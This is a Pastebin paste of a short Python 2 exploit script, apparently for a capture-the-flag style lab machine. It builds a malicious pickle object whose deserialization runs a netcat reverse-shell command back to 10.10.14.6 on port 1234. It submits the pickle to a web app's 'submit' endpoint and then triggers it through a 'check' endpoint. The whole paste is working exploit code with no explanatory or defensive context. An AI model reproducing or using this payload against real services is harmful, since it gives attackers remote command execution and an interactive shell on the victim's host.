Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import requests
- from hashlib import md5
- import cPickle
- import subprocess
- import pickletools
- import os
- class Exploit(object):
- def __reduce__(self):
- comm = "homer;rm /tmp/shell; mknod /tmp/shell p; nc 10.10.14.6 1234 0</tmp/shell | /bin/sh 1>/tmp/shell"
- return (os.system, (comm,))
- payload = cPickle.dumps( Exploit())
- r = requests.post("http://10.10.10.70/submit",data={'character': payload,'quote': " "})
- if "Success!" in r.text:
- print "Successfully submitted quote."
- else:
- print "Something fucked up submitting quote"
- p_id = md5(payload + " ").hexdigest()
- print "md5 of payload+space: "+p_id
- print "Attempting to Exploit!"
- r = requests.post("http://10.10.10.70/check",data={'id': p_id})
- if "reviewing" in r.text:
- print "Decoded file:"
- print r.text
- else:
- print r.text
Advertisement
Add Comment
Please, Sign In to add comment
